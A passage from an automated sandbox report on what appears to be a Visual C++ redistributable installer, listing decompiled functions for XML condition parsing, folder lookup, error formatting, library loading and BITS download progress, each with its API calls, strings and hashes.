                                                                          • Instruction Fuzzy Hash: 8A118C72A00229BB9B25DB99C805DEFBBE8EF44751B114155FE04E7211E7309E509AA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019908 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 24%
                                                                          			E00019908(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t25;
				void* _t29;
				void* _t30;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t29 = E0005388A(_a8, L"Condition",  &_v12);
				if(_t29 != 1) {
					if(_t29 >= 0) {
						_t30 = E000533C8(_v12,  &_v8);
						if(_t30 >= 0) {
							_t30 = E000121A5(_a4, _v8, 0);
							if(_t30 < 0) {
								_push("Failed to copy condition string from BSTR");
								goto L8;
							}
						} else {
							_push("Failed to get Condition inner text.");
							goto L8;
						}
					} else {
						_push("Failed to select condition node.");
						L8:
						_push(_t30);
						E0005012F();
					}
				} else {
					_t30 = 0;
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t25 = _v12;
				if(_t25 != 0) {
					 *((intOrPtr*)( *_t25 + 8))(_t25);
				}
				return _t30;
			}








                                                                          0x0001990d
                                                                          0x00019914
                                                                          0x00019927
                                                                          0x0001992c
                                                                          0x00019934
                                                                          0x00019949
                                                                          0x0001994d
                                                                          0x00019963
                                                                          0x00019967
                                                                          0x00019969
                                                                          0x00000000
                                                                          0x00019969
                                                                          0x0001994f
                                                                          0x0001994f
                                                                          0x00000000
                                                                          0x0001994f
                                                                          0x00019936
                                                                          0x00019936
                                                                          0x0001996e
                                                                          0x0001996e
                                                                          0x0001996f
                                                                          0x00019975
                                                                          0x0001992e
                                                                          0x0001992e
                                                                          0x0001992e
                                                                          0x0001997a
                                                                          0x0001997f
                                                                          0x0001997f
                                                                          0x00019985
                                                                          0x0001998a
                                                                          0x0001998f
                                                                          0x0001998f
                                                                          0x00019998

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001997F
                                                                          Strings
                                                                          • Failed to select condition node., xrefs: 00019936
                                                                          • Failed to get Condition inner text., xrefs: 0001994F
                                                                          • Failed to copy condition string from BSTR, xrefs: 00019969
                                                                          • Condition, xrefs: 0001991A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString
                                                                          • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                          • API String ID: 3341692771-3600577998
                                                                          • Opcode ID: 585e591e49a60a17f4753af866c5a29047f0bba0161620c45b565dff25e63279
                                                                          • Instruction ID: 5e4b287d451bb19e22ca599b33c36adea8b7c10daae79ceeb8c3b712b95c1393
                                                                          • Opcode Fuzzy Hash: 585e591e49a60a17f4753af866c5a29047f0bba0161620c45b565dff25e63279
                                                                          • Instruction Fuzzy Hash: 1311A932D50228BBDB259A94CD15FEEBB68AF00752F10419EFC01BA150DB719F94D7C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00015D71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E00015D71(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _t29;
				void* _t31;

				_t29 = __edx;
				_t26 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				E000509BB(_t26, GetCurrentProcess(),  &_v12);
				if(_v12 != 0) {
					_t31 = E00015BF0(_t26, _a4,  &_v8);
					if(_t31 >= 0) {
						goto L5;
					} else {
						_push("Failed to get 64-bit folder.");
						goto L7;
					}
				} else {
					_t31 = E00053BF7(__ebx, _t26, _t29,  &_v8, _a4);
					if(_t31 >= 0) {
						L5:
						_t31 = E000302F4(_a8, _v8, 0);
						if(_t31 < 0) {
							_push("Failed to set variant value.");
							goto L7;
						}
					} else {
						E000137D3(_t23, "variable.cpp", 0x86e, _t31);
						_push("Failed to get shell folder.");
						L7:
						_push(_t31);
						E0005012F();
					}
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t31;
			}







                                                                          0x00015d71
                                                                          0x00015d71
                                                                          0x00015d74
                                                                          0x00015d75
                                                                          0x00015d76
                                                                          0x00015d7d
                                                                          0x00015d8a
                                                                          0x00015d96
                                                                          0x00015dc7
                                                                          0x00015dcb
                                                                          0x00000000
                                                                          0x00015dcd
                                                                          0x00015dcd
                                                                          0x00000000
                                                                          0x00015dcd
                                                                          0x00015d98
                                                                          0x00015da1
                                                                          0x00015da5
                                                                          0x00015dd4
                                                                          0x00015de1
                                                                          0x00015de5
                                                                          0x00015de7
                                                                          0x00000000
                                                                          0x00015de7
                                                                          0x00015da7
                                                                          0x00015db2
                                                                          0x00015db7
                                                                          0x00015dec
                                                                          0x00015dec
                                                                          0x00015ded
                                                                          0x00015df3
                                                                          0x00015da5
                                                                          0x00015df8
                                                                          0x00015dfd
                                                                          0x00015dfd
                                                                          0x00015e08

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00015D83
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                            • Part of subcall function 00053BF7: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00053C24
                                                                          Strings
                                                                          • Failed to get shell folder., xrefs: 00015DB7
                                                                          • Failed to get 64-bit folder., xrefs: 00015DCD
                                                                          • variable.cpp, xrefs: 00015DAD
                                                                          • Failed to set variant value., xrefs: 00015DE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                          • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2084161155-3906113122
                                                                          • Opcode ID: a0bdc4af09343d34881ad29dedbe4a6be533c4fcf0d10e75095a2a7cc5b3d659
                                                                          • Instruction ID: f261647ad91411416ab5f0b52de1b1cc7d3ac1c687e510868d723d48d6ab231b
                                                                          • Opcode Fuzzy Hash: a0bdc4af09343d34881ad29dedbe4a6be533c4fcf0d10e75095a2a7cc5b3d659
                                                                          • Instruction Fuzzy Hash: 87017C31940A28FADB22A690DC0BBDF7A689B00766F104156F900BE192DAB59A849791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00011F78 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00011F78(void* __ecx, intOrPtr _a4, long _a8, void* _a12, char _a16) {
				short _v8;
				char* _v12;
				long _t16;
				void* _t30;

				_v8 = 0;
				_t15 =  !=  ? 0x19ff : 0x11ff;
				_v12 =  &_a16;
				_t16 = FormatMessageW( !=  ? 0x19ff : 0x11ff, _a12, _a8, 0,  &_v8, 0,  &_v12);
				_v12 = 0;
				if(_t16 != 0) {
					_t30 = E000121A5(_a4, _v8, _t16);
				} else {
					_t34 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
					_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "strutil.cpp", 0x489, _t30);
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _t30;
			}







                                                                          0x00011f8d
                                                                          0x00011f90
                                                                          0x00011f96
                                                                          0x00011faa
                                                                          0x00011fb0
                                                                          0x00011fb5
                                                                          0x00011ff3
                                                                          0x00011fb7
                                                                          0x00011fc8
                                                                          0x00011fd2
                                                                          0x00011fe0
                                                                          0x00011fe0
                                                                          0x00011ff9
                                                                          0x00011ffe
                                                                          0x00011ffe
                                                                          0x0001200a

                                                                          APIs
                                                                          • FormatMessageW.KERNEL32(000011FF,00015386,?,00000000,00000000,00000000,?,80070656,?,?,?,0002E50B,00000000,00015386,00000000,80070656), ref: 00011FAA
                                                                          • GetLastError.KERNEL32(?,?,?,0002E50B,00000000,00015386,00000000,80070656,?,?,00023F6B,00015386,?,80070656,00000001,crypt32.dll), ref: 00011FB7
                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0002E50B,00000000,00015386,00000000,80070656,?,?,00023F6B,00015386), ref: 00011FFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatFreeLastLocalMessage
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 1365068426-569070560
                                                                          • Opcode ID: 5940ce2540c3c6bb73be67c10b53ffcf6a22d3d17cd516bafe4ccaaf474b216b
                                                                          • Instruction ID: a7aef618add7ed6b2bfbc4026c2d56e5d2d3ed03adb5a9f139fd58d31b720e43
                                                                          • Opcode Fuzzy Hash: 5940ce2540c3c6bb73be67c10b53ffcf6a22d3d17cd516bafe4ccaaf474b216b
                                                                          • Instruction Fuzzy Hash: 39116176901229FFEB259F94CC09AEF7AA8EF08341F004169FE01E2150E7759E51D7E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00048731 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E00048731(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x7b4d8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x71d50 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xfbf51acc
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                          0x00048736
                                                                          0x0004873a
                                                                          0x00048741
                                                                          0x00048745
                                                                          0x00048753
                                                                          0x00048769
                                                                          0x0004876d
                                                                          0x00048796
                                                                          0x00048798
                                                                          0x0004879c
                                                                          0x0004879f
                                                                          0x0004879f
                                                                          0x000487a5
                                                                          0x000487a7
                                                                          0x00000000
                                                                          0x000487a8
                                                                          0x0004876f
                                                                          0x00048778
                                                                          0x00048787
                                                                          0x0004877a
                                                                          0x0004877d
                                                                          0x00048783
                                                                          0x00048783
                                                                          0x0004878b
                                                                          0x00000000
                                                                          0x0004878d
                                                                          0x00048790
                                                                          0x00048792
                                                                          0x00000000
                                                                          0x00048792
                                                                          0x0004878b
                                                                          0x00048747
                                                                          0x0004874c
                                                                          0x00000000

                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000488D5,00000000,00000000,?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue), ref: 00048763
                                                                          • GetLastError.KERNEL32(?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue,00072208,00072210,00000000,00000364,?,00046130), ref: 0004876F
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000486D8,000488D5,00000000,00000000,00000000,?,000488D5,00000006,FlsSetValue,00072208,00072210,00000000), ref: 0004877D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: @Met
                                                                          • API String ID: 3177248105-2381362037
                                                                          • Opcode ID: eb57b6e5f09fb886807a76d0afdad5f76f2bc530fb29a25c7b78f21bc34ea690
                                                                          • Instruction ID: 6519f445cf08b9c658bcdc05b9bc68f3f76b9c1dbee81296b900e9b69db8fcc8
                                                                          • Opcode Fuzzy Hash: eb57b6e5f09fb886807a76d0afdad5f76f2bc530fb29a25c7b78f21bc34ea690
                                                                          • Instruction Fuzzy Hash: BC01FC766153265BD7314B699C58A6F3798AF047A1B304A30F906E3140DB24DC01C7E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D7CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 35%
                                                                          			E0003D7CC(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				void* _t21;
				intOrPtr* _t22;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t33;

				_t30 = _a4;
				_v8 = 4;
				EnterCriticalSection(_t30 + 8);
				_t22 = _a8;
				_t33 =  *((intOrPtr*)( *_t22 + 0x38))(_t22,  &_v8, _t29, _t32, _t21, __ecx);
				if(_t33 >= 0) {
					if(_v8 == 2) {
						_t33 = E0003D9C1(_t30, _t22);
						if(_t33 < 0) {
							_push("Failure while sending progress during BITS job modification.");
							goto L5;
						}
					}
				} else {
					_push("Failed to get state during job modification.");
					L5:
					_push(_t33);
					E0005012F();
				}
				LeaveCriticalSection(_t30 + 8);
				if(_t33 < 0) {
					 *(_t30 + 0x20) =  *(_t30 + 0x20) & 0x00000000;
					 *((intOrPtr*)(_t30 + 0x24)) = _t33;
					SetEvent( *(_t30 + 0x28));
				}
				return 0;
			}










                                                                          0x0003d7d3
                                                                          0x0003d7d6
                                                                          0x0003d7e1
                                                                          0x0003d7e7
                                                                          0x0003d7f4
                                                                          0x0003d7f8
                                                                          0x0003d805
                                                                          0x0003d80f
                                                                          0x0003d813
                                                                          0x0003d815
                                                                          0x00000000
                                                                          0x0003d815
                                                                          0x0003d813
                                                                          0x0003d7fa
                                                                          0x0003d7fa
                                                                          0x0003d81a
                                                                          0x0003d81a
                                                                          0x0003d81b
                                                                          0x0003d821
                                                                          0x0003d826
                                                                          0x0003d82e
                                                                          0x0003d833
                                                                          0x0003d837
                                                                          0x0003d83a
                                                                          0x0003d83a
                                                                          0x0003d848

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0003D7E1
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0003D826
                                                                          • SetEvent.KERNEL32(?,?,?,?), ref: 0003D83A
                                                                          Strings
                                                                          • Failed to get state during job modification., xrefs: 0003D7FA
                                                                          • Failure while sending progress during BITS job modification., xrefs: 0003D815
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                          • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                          • API String ID: 3094578987-1258544340
                                                                          • Opcode ID: 3777e9739d662147ca790ef121b1e2211b76326363e4fc189e168c71a517170e
                                                                          • Instruction ID: 54e5f2683af5423fca9a8a1ad7e9163cb0b81063abaf2e39701df11a005be05b
                                                                          • Opcode Fuzzy Hash: 3777e9739d662147ca790ef121b1e2211b76326363e4fc189e168c71a517170e
                                                                          • Instruction Fuzzy Hash: F5019272900615FBCB129B55E849AAEB7ACFF08331F004216E804D7600DB35FD14CBD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004605E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E0004605E(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0x7a05c; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0004523F(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E000488AE(_t20, _t25, _t31, __eflags,  *0x7a05c, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00045ED0(_t25, _t31, 0x7b13c);
							E0004511A(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E0004511A();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E000451FC(_t20, _t25, _t29, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x7a05c; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0004523F(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E000488AE(_t21, _t27, _t32, __eflags,  *0x7a05c, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00045ED0(_t27, _t32, 0x7b13c);
									E0004511A(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E0004511A();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00048858(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00048858(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}






















                                                                          0x0004605e
                                                                          0x0004605e
                                                                          0x0004605e
                                                                          0x00046061
                                                                          0x00046068
                                                                          0x0004606a
                                                                          0x0004606f
                                                                          0x00046072
                                                                          0x00046080
                                                                          0x00046087
                                                                          0x0004608c
                                                                          0x0004608f
                                                                          0x00046092
                                                                          0x000460a4
                                                                          0x000460a9
                                                                          0x000460ab
                                                                          0x000460b6
                                                                          0x000460bd
                                                                          0x000460c2
                                                                          0x000460c5
                                                                          0x000460c7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000460ad
                                                                          0x000460ad
                                                                          0x00000000
                                                                          0x000460ad
                                                                          0x00046094
                                                                          0x00046094
                                                                          0x00046095
                                                                          0x00046095
                                                                          0x0004609a
                                                                          0x000460d5
                                                                          0x000460d6
                                                                          0x000460dc
                                                                          0x000460e1
                                                                          0x000460e4
                                                                          0x000460e5
                                                                          0x000460e6
                                                                          0x000460ed
                                                                          0x000460ef
                                                                          0x000460f1
                                                                          0x000460f6
                                                                          0x000460f9
                                                                          0x00046107
                                                                          0x00046113
                                                                          0x00046116
                                                                          0x00046119
                                                                          0x0004612b
                                                                          0x00046130
                                                                          0x00046132
                                                                          0x0004613d
                                                                          0x00046143
                                                                          0x0004614b
                                                                          0x0004614d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046134
                                                                          0x00046134
                                                                          0x00000000
                                                                          0x00046134
                                                                          0x0004611b
                                                                          0x0004611b
                                                                          0x0004611c
                                                                          0x0004611c
                                                                          0x0004614f
                                                                          0x00046150
                                                                          0x00046150
                                                                          0x000460fb
                                                                          0x00046101
                                                                          0x00046105
                                                                          0x00046158
                                                                          0x00046159
                                                                          0x0004615f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046105
                                                                          0x00046166
                                                                          0x00046166
                                                                          0x00046074
                                                                          0x0004607a
                                                                          0x0004607e
                                                                          0x000460c9
                                                                          0x000460ca
                                                                          0x000460d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004607e

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,000419F5,00000000,80004004,?,00041CF9,00000000,80004004,00000000,00000000), ref: 00046062
                                                                          • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000460CA
                                                                          • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 000460D6
                                                                          • _abort.LIBCMT ref: 000460DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_abort
                                                                          • String ID: @Met
                                                                          • API String ID: 88804580-2381362037
                                                                          • Opcode ID: 5397ae64d9e2471a56adf477c6eb59cbd8e51bfaef417994847199c7bada4c8a
                                                                          • Instruction ID: 3b92537d3c725f417c675b57f375592f74f3d67b73e2813c986aadafb9d534d3
                                                                          • Opcode Fuzzy Hash: 5397ae64d9e2471a56adf477c6eb59cbd8e51bfaef417994847199c7bada4c8a
                                                                          • Instruction Fuzzy Hash: CBF0D1F2500A0067D36236746C0AB9F269A9BC3732F240639F919A2193FE299C01417E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003DA45 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E0003DA45(void* __ecx, intOrPtr* _a4) {
				char _v8;
				struct _CRITICAL_SECTION* _t15;
				void* _t18;
				intOrPtr* _t19;
				void* _t26;
				void* _t27;
				void* _t29;
				intOrPtr _t30;

				_t27 = __ecx;
				_v8 = 4;
				_t2 = _t27 + 8; // 0x8
				EnterCriticalSection(_t2);
				_t19 = _a4;
				_t30 =  *((intOrPtr*)( *_t19 + 0x38))(_t19,  &_v8, _t26, _t29, _t18, __ecx);
				if(_t30 >= 0) {
					if(_v8 != 2) {
						_t30 = E0003D9C1(_t27, _t19);
						if(_t30 < 0) {
							_push("Failure while sending progress.");
							goto L5;
						}
					}
				} else {
					_push("Failed to get BITS job state.");
					L5:
					_push(_t30);
					E0005012F();
				}
				_t7 = _t27 + 8; // 0x8
				_t15 = _t7;
				LeaveCriticalSection(_t15);
				if(_t30 < 0) {
					 *(_t27 + 0x20) =  *(_t27 + 0x20) & 0x00000000;
					 *((intOrPtr*)(_t27 + 0x24)) = _t30;
					_t15 = SetEvent( *(_t27 + 0x28));
				}
				return _t15;
			}











                                                                          0x0003da4c
                                                                          0x0003da4e
                                                                          0x0003da55
                                                                          0x0003da59
                                                                          0x0003da5f
                                                                          0x0003da6c
                                                                          0x0003da70
                                                                          0x0003da7d
                                                                          0x0003da87
                                                                          0x0003da8b
                                                                          0x0003da8d
                                                                          0x00000000
                                                                          0x0003da8d
                                                                          0x0003da8b
                                                                          0x0003da72
                                                                          0x0003da72
                                                                          0x0003da92
                                                                          0x0003da92
                                                                          0x0003da93
                                                                          0x0003da99
                                                                          0x0003da9a
                                                                          0x0003da9a
                                                                          0x0003da9e
                                                                          0x0003daa6
                                                                          0x0003daab
                                                                          0x0003daaf
                                                                          0x0003dab2
                                                                          0x0003dab2
                                                                          0x0003dabe

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0003DBB5), ref: 0003DA59
                                                                          • LeaveCriticalSection.KERNEL32(00000008,?,0003DBB5), ref: 0003DA9E
                                                                          • SetEvent.KERNEL32(?,?,0003DBB5), ref: 0003DAB2
                                                                          Strings
                                                                          • Failed to get BITS job state., xrefs: 0003DA72
                                                                          • Failure while sending progress., xrefs: 0003DA8D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                          • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                          • API String ID: 3094578987-2876445054
                                                                          • Opcode ID: e36274acce0524c045902f67f1d169261fbd15d01090e51e60a3ca00b3f10cb0
                                                                          • Instruction ID: e86d8d9dc4e13ef6755f3116e5f28e7db20721b81612b292fcf193c7aefa8026
                                                                          • Opcode Fuzzy Hash: e36274acce0524c045902f67f1d169261fbd15d01090e51e60a3ca00b3f10cb0
                                                                          • Instruction Fuzzy Hash: 8F01B172A04A25BBC712DB55E949DAEB7ACFF04322F000257F90997610DB75ED0487DA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054C67 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
